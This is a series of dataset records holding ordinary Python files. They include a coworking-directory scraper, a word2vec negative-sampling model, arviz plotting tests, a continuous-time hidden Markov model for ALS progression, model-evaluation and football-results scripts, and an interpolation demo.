1.0e-3, 1.0e-5)\n\nB_ext = B_ext_net_vec(B_per_I, I, func.B_earth)\n\nI = I * 1.0e3 # unit conversion from A to mA\nB_ext = B_ext * 1.0e3 # unit conversion from T to mT\n\nplt.plot(I, B_ext)\nplt.xlabel('Current on Coil [mA]')\nplt.ylabel('Net external field [mT]')\nplt.title('Net external field due to Maxwell Coil and Ambient field')\nplt.show()\n","sub_path":"optical/scripts/maxwell_coil.py","file_name":"maxwell_coil.py","file_ext":"py","file_size_in_byte":1415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"427717735","text":"import requests, re, codecs as co, xlsxwriter as xl\nfrom bs4 import BeautifulSoup\n\nhtml = requests.get('http://coworking-carte.fr/').text\nsp = BeautifulSoup(html, 'html.parser')\nscpt = sp('script')[-4].string.split('\\n')\n\nlist_marker = [co.unicode_escape_decode(re.split(\"[{}]\",x)[1])[0] for x in scpt if 'new google.maps.Marker(' in x]\nlist_data = []\n\nfor m in list_marker:\n data = {}\n splitr = m.split('\"title\":')[1].split(',\"id\":')\n splitr_b = splitr[0][1:-1].split('\\n')\n data['titre'] = splitr_b[0]\n data['adresse'] = splitr_b[1]\n data['tel'] = ''\n data['mail'] = ''\n \n region = splitr[1][1:-1].replace(\"\\/\",\"/\").replace(\" \", \"-\")\n link = 'http://coworking-carte.fr/coworking/' + region\n html_b = requests.get(link).text\n sp_b = BeautifulSoup(html_b, 'html.parser')\n \n tag_ph = sp_b.find(class_=\"phone\")\n if tag_ph.__class__.__name__ != 'NoneType':\n coord = tag_ph.string\n if coord.__class__.__name__ != 'NoneType':\n tab_coord = coord.split(\" - \")\n if len(tab_coord) == 2:\n if '@' in tab_coord[1]:\n data['tel'] = tab_coord[0]\n data['mail'] = tab_coord[1]\n else:\n data['tel'] = tab_coord[1]\n data['mail'] = tab_coord[0]\n elif '@' in coord:\n data['mail'] = coord\n else:\n data['tel'] = coord\n \n list_data.append(data)\n\nwb = xl.Workbook('coworking-carte.xlsx')\nws = wb.add_worksheet()\n\nfor i,k in enumerate(list_data[0].keys()):\n ws.write(0, i, k)\n\nfor i,d in enumerate(list_data):\n for j, v in enumerate(d.values()):\n ws.write(i+1, j, v)\n\nwb.close()","sub_path":"recupdata.py","file_name":"recupdata.py","file_ext":"py","file_size_in_byte":1709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"529972620","text":"# -*- coding: utf-8 -*-\n\nimport numpy as np\nimport torch as t\nimport torch.nn as nn\n\nfrom torch import LongTensor as LT\nfrom torch import FloatTensor as FT\n\n\nclass Bundler(nn.Module):\n\n def forward(self, data):\n raise NotImplementedError\n\n def forward_i(self, data):\n raise NotImplementedError\n\n def forward_o(self, data):\n raise NotImplementedError\n\n\nclass Word2Vec(Bundler):\n\n def __init__(self, vocab_size=20000, embedding_size=300, padding_idx=0):\n super(Word2Vec, self).__init__()\n self.vocab_size = vocab_size\n self.embedding_size = embedding_size\n self.ivectors = nn.Embedding(self.vocab_size, self.embedding_size, padding_idx=padding_idx)\n self.ovectors = nn.Embedding(self.vocab_size, self.embedding_size, padding_idx=padding_idx)\n self.ivectors.weight = nn.Parameter(t.cat([t.zeros(1, self.embedding_size), FT(self.vocab_size - 1, self.embedding_size).uniform_(-0.5 / self.embedding_size, 0.5 / self.embedding_size)]))\n self.ovectors.weight = nn.Parameter(t.cat([t.zeros(1, self.embedding_size), FT(self.vocab_size - 1, self.embedding_size).uniform_(-0.5 / self.embedding_size, 0.5 / self.embedding_size)]))\n self.ivectors.weight.requires_grad = True\n self.ovectors.weight.requires_grad = True\n\n def forward(self, data):\n return self.forward_i(data)\n\n def forward_i(self, data):\n v = LT(data)\n v = v.cuda() if self.ivectors.weight.is_cuda else v\n return self.ivectors(v)\n\n def forward_o(self, data):\n v = LT(data)\n v = v.cuda() if self.ovectors.weight.is_cuda else v\n return self.ovectors(v)\n\nclass Word2VecHidden(Bundler):\n\n def __init__(self, vocab_size=20000, embedding_size=300, hidden_size=100, padding_idx=0):\n super(Word2VecHidden, self).__init__()\n self.vocab_size = vocab_size\n self.embedding_size = embedding_size\n self.ivectors = nn.Embedding(self.vocab_size, self.embedding_size, padding_idx=padding_idx)\n self.ovectors = nn.Embedding(self.vocab_size, self.embedding_size, padding_idx=padding_idx)\n self.ivectors.weight = nn.Parameter(t.cat([t.zeros(1, self.embedding_size), FT(self.vocab_size - 1, self.embedding_size).uniform_(-0.5 / self.embedding_size, 0.5 / self.embedding_size)]))\n self.ovectors.weight = nn.Parameter(t.cat([t.zeros(1, self.embedding_size), FT(self.vocab_size - 1, self.embedding_size).uniform_(-0.5 / self.embedding_size, 0.5 / self.embedding_size)]))\n self.iW = nn.Parameter(FT(hidden_size, embedding_size).uniform_(-0.5, 0.5))\n self.oW = nn.Parameter(FT(hidden_size, embedding_size).uniform_(-0.5, 0.5))\n self.ivectors.weight.requires_grad = True\n self.ovectors.weight.requires_grad = True\n self.sm = t.nn.Softmax(dim=-1)\n\n def forward(self, data):\n return self.forward_i(data)\n\n def forward_i(self, data):\n v = LT(data)\n v = v.cuda() if self.ivectors.weight.is_cuda else v\n return t.matmul(self.sm(self.ivectors(v)), t.transpose(self.iW, 1, 0))\n\n def forward_o(self, data):\n v = LT(data)\n v = v.cuda() if self.ovectors.weight.is_cuda else v\n return t.matmul(self.sm(self.ovectors(v)), t.transpose(self.oW, 1, 0))\n\n\nclass SGNS(nn.Module):\n\n def __init__(self, embedding, vocab_size=20000, n_negs=20, weights=None, tie_weights=False, fake_indices=None):\n super(SGNS, self).__init__()\n self.embedding = embedding\n self.vocab_size = vocab_size\n self.n_negs = n_negs\n self.weights = None\n if weights is not None:\n wf = np.power(weights, 0.75)\n wf = wf / wf.sum()\n self.weights = FT(wf)\n self.tie_weights = tie_weights\n if weights is not None and fake_indices is not None:\n is_fake = t.zeros(4000).type(t.bool)\n is_fake[t.LongTensor(list(fake_indices))] = True\n # adjust weights here and zero them out\n self.weights_real = self.weights.detach().clone()\n self.weights_real[is_fake] = 0.0\n self.weights_fake = self.weights.detach().clone()\n self.weights_fake[~is_fake] = 0.0\n self.fake_indices = t.LongTensor(list(fake_indices))\n\n def forward(self, iword, owords):\n batch_size = iword.size()[0]\n context_size = owords.size()[1]\n if self.fake_indices is None:\n if self.weights is not None:\n nwords = t.multinomial(self.weights, batch_size * context_size * self.n_negs, replacement=True).view(batch_size, -1)\n else:\n nwords = FT(batch_size, context_size * self.n_negs).uniform_(0, self.vocab_size - 1).long()\n else:\n if self.weights is not None:\n # do broadcasting to check the values\n is_fake = iword.view(-1, 1).eq(self.fake_indices).sum(1).type(t.bool)\n n_fake = is_fake.sum()\n n_real = batch_size - n_fake\n # two times sampling\n nwords_fake = t.multinomial(self.weights_fake, n_fake * context_size * self.n_negs, replacement=True).view(n_fake, -1)\n nwords_real = t.multinomial(self.weights_real, n_real * context_size * self.n_negs, replacement=True).view(n_real, -1)\n # create empty tensor and use is_fake to assign the sampled words to it\n nwords = t.zeros(batch_size, context_size * self.n_negs).type(t.long)\n nwords[is_fake] = nwords_fake\n nwords[~is_fake] = nwords_real\n else:\n raise NotImplementedError()\n ivectors = self.embedding.forward_i(iword).unsqueeze(2)\n if self.tie_weights:\n ovectors = self.embedding.forward_i(owords)\n nvectors = self.embedding.forward_i(nwords).neg()\n else:\n ovectors = self.embedding.forward_o(owords)\n nvectors = self.embedding.forward_o(nwords).neg()\n oloss = t.bmm(ovectors, ivectors).squeeze().sigmoid().log().mean(1)\n nloss = t.bmm(nvectors, ivectors).squeeze().sigmoid().log().view(-1, context_size, self.n_negs).sum(2).mean(1)\n return -(oloss + nloss).mean()\n","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":6195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"551632751","text":"\"\"\"Tests use the 'bokeh' backend.\"\"\"\n# pylint: disable=redefined-outer-name,too-many-lines\nfrom pandas import DataFrame\nimport numpy as np\nimport pytest\n\nfrom .helpers import ( # pylint: disable=unused-import\n eight_schools_params,\n models,\n create_model,\n multidim_models,\n create_multidimensional_model,\n)\nfrom ..rcparams import rcParams, rc_context\nfrom ..plots import (\n plot_trace,\n plot_kde,\n plot_dist,\n)\n\nrcParams[\"data.load\"] = \"eager\"\n\n\n@pytest.fixture(scope=\"module\")\ndef data(eight_schools_params):\n data = eight_schools_params\n return data\n\n\n@pytest.fixture(scope=\"module\")\ndef df_trace():\n return DataFrame({\"a\": np.random.poisson(2.3, 100)})\n\n\n@pytest.fixture(scope=\"module\")\ndef discrete_model():\n \"\"\"Simple fixture for random discrete model\"\"\"\n return {\"x\": np.random.randint(10, size=100), \"y\": np.random.randint(10, size=100)}\n\n\n@pytest.fixture(scope=\"module\")\ndef continuous_model():\n \"\"\"Simple fixture for random continuous model\"\"\"\n return {\"x\": np.random.beta(2, 5, size=100), \"y\": np.random.beta(2, 5, size=100)}\n\n\n@pytest.mark.parametrize(\n \"kwargs\",\n [\n {},\n {\"var_names\": \"mu\"},\n {\"var_names\": [\"mu\", \"tau\"]},\n {\"combined\": True},\n {\"compact\": True},\n {\"combined\": True, \"compact\": True, \"legend\": True},\n {\"divergences\": \"top\"},\n {\"divergences\": False},\n {\"lines\": [(\"mu\", {}, [1, 2])]},\n {\"lines\": [(\"mu\", {}, 8)]},\n ],\n)\ndef test_plot_trace(models, kwargs):\n axes = plot_trace(models.model_1, backend=\"bokeh\", show=False, **kwargs)\n assert axes.shape\n\n\ndef test_plot_trace_discrete(discrete_model):\n axes = plot_trace(discrete_model, backend=\"bokeh\", show=False)\n assert axes.shape\n\n\ndef test_plot_trace_max_subplots_warning(models):\n with pytest.warns(SyntaxWarning):\n with rc_context(rc={\"plot.max_subplots\": 1}):\n axes = plot_trace(models.model_1, backend=\"bokeh\", show=False)\n assert axes.shape\n\n\ndef test_plot_kde(continuous_model):\n axes = plot_kde(continuous_model[\"y\"], backend=\"bokeh\", show=False)\n assert axes\n\n\n@pytest.mark.parametrize(\n \"kwargs\",\n [\n {\"cumulative\": True},\n {\"cumulative\": True, \"plot_kwargs\": {\"line_dash\": \"dashed\"}},\n {\"rug\": True},\n {\"rug\": True, \"rug_kwargs\": {\"line_alpha\": 0.2}},\n ],\n)\ndef test_plot_kde_cumulative(continuous_model, kwargs):\n axes = plot_kde(continuous_model[\"x\"], backend=\"bokeh\", show=False, **kwargs)\n assert axes\n\n\n@pytest.mark.parametrize(\"kwargs\", [{\"kind\": \"hist\"}, {\"kind\": \"kde\"}])\ndef test_plot_dist(continuous_model, kwargs):\n axes = plot_dist(continuous_model[\"x\"], backend=\"bokeh\", show=False, **kwargs)\n assert axes\n","sub_path":"arviz/tests/test_plots_bokeh.py","file_name":"test_plots_bokeh.py","file_ext":"py","file_size_in_byte":2728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"497733984","text":"import pandas as pd\nimport numpy as np\nimport scipy.linalg as la\nimport matplotlib.pyplot as plt\nimport argparse\nimport pickle\nfrom tqdm import tqdm\nfrom scipy.special import logsumexp\nfrom scipy.stats import multivariate_normal\n\nclass CTHMM:\n def __init__(self, n_states, n_dim):\n self.n_states = n_states\n self.log_pi = np.log(np.ones((self.n_states)) / self.n_states)\n self.log_P = {}\n self.n_pid = 0\n self.log_likelihoods = None\n\n # init R\n self.R = -np.eye(self.n_states)\n self.R[-1, -1] = 0\n for i in range(self.n_states - 1):\n self.R[i,i+1:] = 1 / (self.R[i+1:].shape[0])\n\n self.n_dim = n_dim\n\n # init emission matrix\n self.emission_matrix = np.zeros((2, self.n_states, self.n_dim))\n self.emission_matrix[0, :, :] = 2\n self.emission_matrix[1, :, :] = .5\n self.emission_matrix[0, 0, :] = 4\n self.emission_matrix[0, -1, :] = 0\n\n def EM_step(self, data):\n ### E Step ###\n\n self.n_pid = data['subject_id'].unique().shape[0]\n\n log_pi_update = np.zeros((self.n_states))\n weighted_means = np.log(np.zeros((self.n_states, self.n_dim)))\n\n unique_intervals = data['delta_t'].unique()\n C = np.zeros((unique_intervals.shape[0], self.n_states, self.n_states))\n interval_map = {}\n\n total_weight_assgn = np.log(np.zeros((self.n_states)))\n\n for pid, pdata in tqdm(data.groupby('subject_id')):\n obs = pdata.drop(['subject_id', 'ALSFRS_Delta', 'delta_t', 'ALSFRS_Total'], axis=1).values\n intervals = pdata['delta_t'].values\n\n alpha = self.forward(obs, intervals)\n beta = self.backward(obs, intervals)\n\n LL = logsumexp((alpha[:, -1] + beta[:, -1]))\n\n for idx, t_delta in enumerate(intervals[1:]):\n if t_delta not in interval_map:\n interval_map[t_delta] = len(interval_map.keys())\n log_P = self.log_transition_matrix(t_delta)\n log_emission = self.log_emission(obs[idx + 1, :])\n for src in range(self.n_states):\n for dest in range(self.n_states):\n C[interval_map[t_delta], src, dest] = logsumexp([C[interval_map[t_delta], src, dest], alpha[src, idx], log_P[src, dest],\n beta[dest, idx + 1], log_emission[dest]])\n\n log_pi_update = logsumexp([log_pi_update, alpha[:, 0] + beta[:, 0] - LL], axis=0)\n log_weights = np.zeros(alpha.shape)\n for t in range(log_weights.shape[1]):\n log_weights[:,t] = alpha[:,t] + beta[:,t] - logsumexp(alpha[:,t] + beta[:,t]) # M x T\n for i in range(self.n_states):\n for t in range(log_weights.shape[1]):\n for d in range(self.n_dim):\n weighted_means[i, d] = logsumexp([weighted_means[i,d], log_weights[i,t] + np.log(obs[t,d])])\n total_weight_assgn[i] = logsumexp([total_weight_assgn[i], log_weights[i,t]])\n# weighted_means[i, j] = np.e**(alpha + beta - LL) @ obs\n\n\n ### M Step ###\n\n # Update emission params\n self.emission_matrix[0, 1:-1, :] = np.e**(weighted_means - total_weight_assgn[:, None])[1:-1, :]\n\n # Update pi\n self.log_pi = log_pi_update - logsumexp(log_pi_update)\n\n # Updated R\n A = np.zeros((self.n_states * 2, self.n_states * 2))\n A[:self.n_states, :self.n_states] = self.R\n A[self.n_states:, self.n_states:] = self.R\n\n D = np.zeros((self.n_states, self.n_states, self.n_states))\n tau = np.zeros((self.n_states))\n\n N = np.zeros((self.n_states, self.n_states, self.n_states, self.n_states))\n nu = np.zeros((self.n_states, self.n_states))\n\n C = np.e**(C) - 1\n\n for i in range(self.n_states):\n A[i, self.n_states + i] = 1\n for t_delta in unique_intervals:\n if t_delta == 0:\n continue\n D[i] = la.expm(A * t_delta)[:self.n_states, self.n_states:] / \\\n np.e**(self.log_transition_matrix(t_delta))\n D = np.nan_to_num(D)\n tau[i] += np.sum(C[interval_map[t_delta], :, :] * D[i, :, :])\n A[i, self.n_states + i] = 0\n\n for i in range(self.n_states):\n for j in range(self.n_states):\n A[i, self.n_states + j] = 1\n for t_delta in unique_intervals:\n if t_delta == 0:\n continue\n N[i, j] = self.R[i, j] * la.expm(A * t_delta)[:self.n_states, self.n_states:] / \\\n np.e**(self.log_transition_matrix(t_delta))\n N = np.nan_to_num(N)\n nu[i, j] += np.sum(C[interval_map[t_delta], :, :] * N[i, j, :, :])\n A[i, self.n_states + j] = 0\n\n for i in range(self.n_states):\n self.R[i, i+1:] = nu[i, i+1:] / tau[i]\n self.R[i, i] = -np.sum(self.R[i, i+1:])\n\n self.log_P = {}\n\n\n def log_transition_matrix(self, t_delta):\n \"\"\"\n Input:\n t_delta scalar\n Output:\n P M x M\n \"\"\"\n if t_delta in self.log_P:\n return self.log_P[t_delta]\n\n self.log_P[t_delta] = np.log(la.expm(self.R * t_delta))\n\n\n return self.log_P[t_delta]\n\n def log_emission(self, observation):\n \"\"\"\n Input: D x 1\n Output: M x 1\n \"\"\"\n b = np.ndarray(self.n_states, dtype=float)\n for i in range(self.n_states):\n means = self.emission_matrix[0, i]\n covariance = np.diag(self.emission_matrix[1, i])\n b[i] = multivariate_normal.logpdf(observation, means, covariance)\n return b\n\n def forward(self, obs, intervals):\n \"\"\"\n Input:\n obs T x D\n intervals T\n n_states scalar\n Output:\n alpha M x T\n \"\"\"\n T = obs.shape[0]\n alpha = np.zeros((self.n_states, T))\n\n alpha[:, 0] = self.log_pi + self.log_emission(obs[0, :])\n tmp = np.zeros((self.n_states))\n\n for idx, t_delta in enumerate(intervals[1:]):\n log_B = self.log_emission(obs[idx + 1, :])\n log_P = self.log_transition_matrix(t_delta)\n\n for dest in range(self.n_states):\n for src in range(self.n_states):\n tmp[src] = alpha[src, idx] + log_P[src, dest]\n\n alpha[dest, idx + 1] = log_B[dest] + logsumexp(tmp)\n\n return alpha\n\n def backward(self, observations, time_intervals):\n T = observations.shape[0]\n beta = np.zeros((self.n_states, T), dtype=float)\n for t in range(T - 2, -1, -1):\n a = self.log_transition_matrix(time_intervals[t])\n b = self.log_emission(observations[t + 1])\n for i in range(self.n_states):\n beta[i, t] = logsumexp([beta[j, t + 1] + a[i, j] + b[j] for j in range(self.n_states)])\n\n return beta\n\n def update_pi(self, alpha, beta):\n self.log_pi = alpha[0, :] + beta[0, :]\n\n def log_likelihood(self, data):\n total = 0\n for pid, pdata in data.groupby('subject_id'):\n obs = pdata.drop(['subject_id', 'ALSFRS_Delta', 'delta_t', 'ALSFRS_Total'], axis=1).values\n intervals = pdata['delta_t'].values\n\n alpha = self.forward(obs, intervals)\n total += logsumexp(alpha[-1])\n\n return total\n\n def save(self, filename):\n pickle.dump(self, open(filename, 'wb'))\n\n @classmethod\n def load(cls, filename):\n return pickle.load(open(filename, 'rb'))\n\ndef train(model, training_data, n_epochs, save_epochs=None, save_filename=None, plot_filename=None):\n should_save = (save_epochs is not None) and (save_filename is not None)\n log_likelihoods = np.ndarray(n_epochs, dtype=float)\n for epoch in tqdm(range(n_epochs)):\n model.EM_step(training_data)\n log_likelihood = model.log_likelihood(training_data)\n log_likelihoods[epoch] = log_likelihood\n\n if should_save and ((epoch + 1) % save_epochs == 0):\n model.save(save_filename)\n\n model.log_likelihoods = log_likelihoods\n if should_save:\n model.save(save_filename)\n\n plt.scatter(range(1,n_epochs+1), log_likelihoods)\n plt.xlabel('epoch')\n plt.ylabel('log likelihood')\n plt.title('model training')\n\n if plot_filename is not None:\n plt.savefig(plot_filename)\n\n plt.show()\n\ndef err(a, b):\n return abs(a.sum() - b.sum()) / b.sum()\n\ndef test(model, test_data):\n results = []\n for pid, pdata in tqdm(test_data.groupby('subject_id')):\n obs = pdata.drop(['subject_id', 'ALSFRS_Delta', 'delta_t', 'ALSFRS_Total'], axis=1).values\n intervals = pdata['delta_t'].values\n\n if pdata.shape[0] == 1 or obs[-1].sum() == 0:\n continue\n\n log_state_dist = model.forward(obs[:-1], intervals[:-1])[:,-1]\n state_dist = np.exp(log_state_dist - logsumexp(log_state_dist))\n\n out_state_dist = state_dist @ la.expm(model.R * intervals[-1])\n\n out_emissions = np.ndarray((out_state_dist.shape[0], obs.shape[1]))\n for i in range(out_state_dist.shape[0]):\n # weighted\n out_emissions[i] = out_state_dist[i] * model.emission_matrix[0,i]\n\n out_obs = np.array([out_emissions[:,i].sum() for i in range(out_emissions.shape[1])])\n\n # out_total = out_obs.sum()\n # final_total = pdata.iloc[-1]['ALSFRS_Total']\n\n mse = err(out_obs, obs[-1])\n results.append((out_obs, obs[-1], mse))\n\n return np.array(results)\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('-M', '--n_states', type=int, default=5, help=\"number of hidden states\")\n parser.add_argument('-e', '--epochs', type=int, default=10, help=\"number of epochs to train for\")\n parser.add_argument('-s', '--save_filename', type=str, help=\"filename for saving model\")\n parser.add_argument('-l', '--load_filename', type=str, help=\"filename for loading model\")\n parser.add_argument('-t', '--save_epochs', type=int, default=2, help=\"save model every t epochs\")\n parser.add_argument('-p', '--plot_filename', type=str, help=\"filename for saving log likelihood plot\")\n parser.add_argument('-n', '--num_pids', type=int, default=None, help=\"number of patients to use\")\n parser.add_argument('-r', '--test', action='store_true', default=False, help=\"test instead of train model\")\n parser.add_argument('data_csv', type=str, help=\"csv with training/test data\")\n args = parser.parse_args()\n\n # load data\n data = pd.read_csv(args.data_csv, index_col=0)\n n_dim = len(data.columns.drop(['subject_id', 'ALSFRS_Delta', 'delta_t', 'ALSFRS_Total']))\n\n if args.num_pids is not None:\n data = data[data['subject_id'].isin(data['subject_id'].unique()[:args.num_pids])]\n\n # load/initiate model\n model = None\n if args.load_filename is not None:\n model = CTHMM.load(args.load_filename)\n if model.n_dim != n_dim:\n print('ERROR: training/test data observations do not have the same dimensions as model')\n exit(1)\n\n if args.test:\n if model is None:\n print('ERROR: no model to test with')\n exit(1)\n\n results = test(model, data)\n errors = results[:,2]\n print('mean test error: {}'.format(errors.mean()))\n return\n\n if model is None:\n model = CTHMM(args.n_states, n_dim)\n\n if args.save_filename is None:\n print('WARNING: the resulting model will not be saved anywhere (provide a save_filename with -s to save the model)')\n\n train(model, data, args.epochs, save_epochs=args.save_epochs, save_filename=args.save_filename, plot_filename=args.plot_filename)\n\nif __name__ == '__main__':\n main()\n","sub_path":"CTHMM_ALS/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"71390647","text":"import pandas as pd\r\nimport numpy as np\r\nimport joblib as jl\r\nfrom os import listdir\r\nfrom os.path import join\r\n\r\nOUTPUT = \"../output\"\r\nDATA = \"../output/data\"\r\n\r\n\r\n\r\ndef get_models_from_folder(pca=True):\r\n\t\"\"\"\r\n\treturns list of directories to model files\r\n\t\"\"\"\r\n\r\n\tfolder = 'models_predictions_pca' if pca else 'models_predictions_nopca'\r\n\tmodels = ([join(OUTPUT, folder, m) for m in listdir(join(OUTPUT, folder))\r\n\t\tif 'Model' in m and '0.9' in m])\r\n\r\n\treturn models\r\n\r\n\r\ndef get_test_predictions_files(pca=True):\r\n\t\"\"\"\r\n\treturns list of files that have information on predictions\r\n\tfor test data\t\r\n\t\"\"\"\r\n\r\n\tfolder = 'models_predictions_pca' if pca else 'models_predictions_nopca'\r\n\tpredictions = [join(OUTPUT, folder, p) for p in listdir(join(OUTPUT, folder)) \\\r\n\t\tif 'Predictions' in p and 'Test' in p]\r\n\r\n\treturn predictions\r\n\r\n\r\ndef load_test_data(pca=True):\r\n\t\"\"\"\r\n\treturns df of test features - for pca colnames will be unnamed\r\n\t\"\"\"\r\n\r\n\tflist = [f for f in listdir(DATA) if 'Test' in f]\r\n\tif pca:\r\n\t\tflist = [f for f in flist if 'PCA' in f]\r\n\r\n\r\n\tif len(flist) != 1:\r\n\t\traise Exception(\"File is not uniquely identified\")\r\n\r\n\tfeat_file = flist[0]\r\n\ttest_feats = jl.load(join(DATA, feat_file))\r\n\treturn test_feats\r\n\r\n\r\ndef load_test_target():\r\n\t\"\"\"\r\n\treturns test target\r\n\t\"\"\"\r\n\treturn jl.load(join(DATA, 'Data - Test Target.joblib'))\r\n\r\n\r\n\r\ndef generate_prediction(model, test_feats):\r\n\t\"\"\"\r\n\treturns array of predictions for model on test data\r\n\tinputs\r\n\t\tmodel: string representing a model joblib file\r\n\t\ttest_feats: df of test features\r\n\t\"\"\"\r\n\tprint('predicting for', model)\r\n\tmodel = jl.load(model)\r\n\tpredictions = model.predict(test_feats)\r\n\treturn predictions\r\n\r\n\r\ndef generate_all_predictions(model_list, test_feats):\r\n\t\"\"\"\r\n\tcalculates predictions for all models in folder\r\n\tinputs:\r\n\t\tmodel_list: list of model paths\r\n\t\ttest_feats: df of test features\r\n\treturns\r\n\r\n\t\"\"\"\r\n\r\n\tdf = pd.DataFrame\r\n\r\n\tfor m in model_list:\r\n\r\n\t\tpredictions = generate_prediction(m, test_feats)\r\n\t\tpath = get_save_path(m)\r\n\t\tjl.dump(predictions, path)\r\n\r\n\r\ndef execute_all_predictions():\r\n\t\"\"\"\r\n\tcalculates predictions for pca and non pca data\r\n\t!!!! not working for non-pca - something about the file path name\r\n\tnot enough time to fix\r\n\t\"\"\"\r\n\r\n\tfor pca in (True, False):\r\n\t\ttest_data = load_test_data(pca)\r\n\t\tmodel_list = get_models_from_folder(pca)\r\n\r\n\t\tgenerate_all_predictions(model_list, test_data)\r\n\r\n\tprint('done')\r\n\r\n\r\ndef get_save_path(m):\r\n\t\"\"\"\r\n\treturns name for output file as a function of model filename\r\n\t\"\"\"\r\n\r\n\tp = m.replace('Model', 'Predictions')\r\n\tp = p[:p.find('0.8')] + 'Test.joblib'\r\n\r\n\treturn p\r\n\r\n\r\ndef calc_MAE(test_target, predictions, var):\r\n\t\"\"\"\r\n\treturns mean absolute error for predictions on test_target\r\n\tvar allows for flexibility in target variable\r\n\ttest_target: df with observed values for target var\r\n\t\"\"\"\r\n\r\n\tmae = abs(test_target[var] - predictions).mean()\r\n\r\n\treturn mae\r\n\r\n\r\ndef calc_MAE_by_model(prediction_list, test_target, pca=True):\r\n\t\"\"\"\r\n\treturns df with columns for model and MAE\r\n\tinputs:\r\n\t\tprediction_list: list of prediction filenames\r\n\t\ttest_target: df with observed values for target var\r\n\t\"\"\"\r\n\r\n\tmaes = []\r\n\tvar = 'retail_and_recreation_percent_change_from_baseline'\r\n\r\n\tname_cutoff = 33 if pca else 35\r\n\r\n\tfor p in prediction_list:\r\n\t\tprediction = jl.load(p)\r\n\t\tn = p[name_cutoff:p.find(' - Test')]\r\n\r\n\t\tmae = calc_MAE(test_target, prediction, var)\r\n\t\tmaes.append((n, mae))\r\n\r\n\tdf = pd.DataFrame.from_records(maes)\r\n\tdf.columns = ['Model', 'MAE']\r\n\r\n\treturn df\r\n\r\n\r\ndef execute_MAE_cal():\r\n\t\"\"\"\r\n\texecutes process of create MAE for all predictions\r\n\treturns df of MAEs per model and saves csv in output folder\r\n\t\"\"\"\r\n\r\n\ttest_target = load_test_target()\r\n\tprediction_list = get_test_predictions_files(pca=True)\r\n\trv = calc_MAE_by_model(prediction_list, test_target)\r\n\trv['version'] = rv['Model'].str[-1]\r\n\trv['Model'] = rv['Model'].apply(lambda x: x[:x.find(' - ')])\r\n\r\n\tprint('outputting csv...')\r\n\trv.to_csv(join(OUTPUT, 'test_MAEs.csv'), index=False)\r\n\r\n\treturn rv\r\n\r\n\r\nif __name__ == '__main__':\r\n\r\n\tprint('whaddup')\r\n\texecute_MAE_cal()\r\n\r\n\r\n\r\n\r\n","sub_path":"scripts/evaluate_models_on_test.py","file_name":"evaluate_models_on_test.py","file_ext":"py","file_size_in_byte":4102,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"69373209","text":"\"\"\"\nUse the football data API to get past years data\nUsage example:\npython make_results_csv.py --start_year 2018 --output_dir ./airsenal/data/\n\"\"\"\n\nimport os\nimport sys\nimport argparse\nfrom airsenal.framework.data_fetcher import MatchDataFetcher\nfrom airsenal.framework.mappings import alternative_team_names\n\n\n\ndef main(args):\n start_year = args.start_year\n start_year_short = start_year[-2:]\n end_year_short = str(int(start_year_short) + 1)\n end_year = \"20\" + end_year_short\n\n outfilename = os.path.join(args.output_dir,\"results_{}{}_with_gw.csv\".format(\n start_year_short, end_year_short))\n\n outfile = open(outfilename, \"w\")\n outfile.write(\"date,home_team,away_team,home_score,away_score,gameweek\\n\")\n\n home_team = \"\"\n away_team = \"\"\n datestr = \"\"\n\n gameweek = 0\n md = MatchDataFetcher()\n\n for gw in range(1,39):\n results = md.get_results(gw, start_year)\n for result in results:\n date = result[0].split(\"T\")[0]\n home_team = alternative_team_names[result[1]][1]\n away_team = alternative_team_names[result[2]][1]\n home_score = result[3]\n away_score = result[4]\n outfile.write(\"{},{},{},{},{},{}\\n\".format(date,\n home_team,\n away_team,\n home_score,\n away_score,\n gw))\n print(\"{} {} {} {} {} {}\".format(gw, date, home_team, away_team, home_score, away_score))\n outfile.close()\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"Create results CSV\")\n parser.add_argument(\"--start_year\",\n help=\"Year that season started\",\n required=True)\n parser.add_argument(\"--output_dir\",\n help=\"output directory for CSV file\",\n required=True)\n args = parser.parse_args()\n main(args)\n","sub_path":"airsenal/scripts/make_results_csv.py","file_name":"make_results_csv.py","file_ext":"py","file_size_in_byte":2109,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"256804816","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport math\n\ndef func_33(x):\n return np.exp(x) + x*np.log10(x) + x\n\nstart = 4.5\nend = 25\nstep = 0.5\n\nx = np.arange(start, end, step)\ny = func_33(x)\n\norder = 11 # order of polynom\nA = np.fliplr(np.vander(x, order))\nprint(\"A \", A)\ncoefs, _, _, _ = np.linalg.lstsq(A, y)\nprint(\"coefs \", coefs)\n\ncnt = 10 # number of points to plot\ninterp_x = np.linspace(start, end, cnt)\nprint(\"Interp_x\", interp_x)\n\nprint(interp_x)\ninterp_y = np.zeros(cnt)\n\nfor ind, ix in enumerate(interp_x):\n print(ind,ix)\n interp_y[ind] = np.sum(coefs * ix ** np.arange(0, order))\n\nprint(\"interp_y\",interp_y)\n\nplt.figure()\nplt.plot(interp_x, interp_y, '-b', label='Лінія інтерполяції')\nplt.plot(x, y, '*r', label='Значення у функції')\nplt.xlabel('Значення х')\nplt.ylabel('Значення y')\nplt.title('Інтерполяція Вандермонда')\nplt.show()","sub_path":"courses/2/vandermond.py","file_name":"vandermond.py","file_ext":"py","file_size_in_byte":934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"502118467","text":"from Crypto.Cipher import DES\r\nfrom Crypto.Util.Padding import pad\r\n#KELOMPOK 1\r\n\"\"\"\r\nBagas Aditya pramudana\t\t\t(V3920012) \r\nDion Aji cahyono\t\t\t\t(V3920018) \r\nIsnan Nur 